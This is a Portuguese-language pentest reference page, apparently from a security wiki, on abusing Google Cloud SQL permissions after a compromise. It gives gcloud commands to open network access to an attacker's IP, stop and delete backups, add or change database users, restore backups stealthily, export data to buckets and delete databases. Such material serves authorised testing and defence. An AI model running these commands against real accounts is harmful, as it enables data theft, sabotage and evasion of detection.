GCP - Cloud SQL Post Exploitation

Cloud SQL

Para mais informações sobre Cloud SQL, confira:

cloudsql.instances.update, ( cloudsql.instances.get)

Para se conectar aos bancos de dados, você só precisa de acesso à porta do banco de dados e saber o nome de usuário e a senha, não há requisitos de IAM. Portanto, uma maneira fácil de obter acesso, supondo que o banco de dados tenha um endereço IP público, é atualizar as redes permitidas e permitir que seu próprio endereço IP acesse-o.

# Use --assign-ip to make the database get a public IPv4
gcloud sql instances patch $INSTANCE_NAME \
--authorized-networks "$(curl ifconfig.me)" \
--assign-ip \
--quiet

mysql -h <ip_db> # If mysql

# With cloudsql.instances.get you can use gcloud directly
gcloud sql connect mysql --user=root --quiet

Também é possível usar --no-backup para interromper os backups do banco de dados.

Como esses são os requisitos, não tenho certeza do que são as permissões cloudsql.instances.connect e cloudsql.instances.login. Se você souber, envie um PR!

cloudsql.users.list

Obtenha uma lista de todos os usuários do banco de dados:

gcloud sql users list --instance <intance-name>

cloudsql.users.create

Esta permissão permite criar um novo usuário dentro do banco de dados:

gcloud sql users create <username> --instance <instance-name> --password <password>

cloudsql.users.update

Esta permissão permite atualizar o usuário dentro do banco de dados. Por exemplo, você poderia mudar sua senha:

gcloud sql users set-password <username> --instance <instance-name> --password <password>

cloudsql.instances.restoreBackup, cloudsql.backupRuns.get

Backups podem conter informações sensíveis antigas, então é interessante verificá-las. Restaure um backup dentro de um banco de dados:

gcloud sql backups restore <backup-id> --restore-instance <instance-id>

Para fazê-lo de uma maneira mais furtiva, é recomendável criar uma nova instância SQL e recuperar os dados lá em vez de nas bases de dados atualmente em execução.

cloudsql.backupRuns.delete

Esta permissão permite excluir backups:

gcloud sql backups delete <backup-id> --instance <instance-id>

cloudsql.instances.export, storage.objects.create

Exporte um banco de dados para um Bucket do Cloud Storage para que você possa acessá-lo a partir daí:

# Export sql format, it could also be csv and bak
gcloud sql export sql <instance-id> <gs://bucketName/fileName> --database <db>

cloudsql.instances.import, storage.objects.get

Importar um banco de dados (sobrescrever) de um Bucket do Cloud Storage:

# Import format SQL, you could also import formats bak and csv
gcloud sql import sql <instance-id> <gs://bucketName/fileName>

cloudsql.databases.delete

Excluir um banco de dados da instância do db:

gcloud sql databases delete <db-name> --instance <instance-id>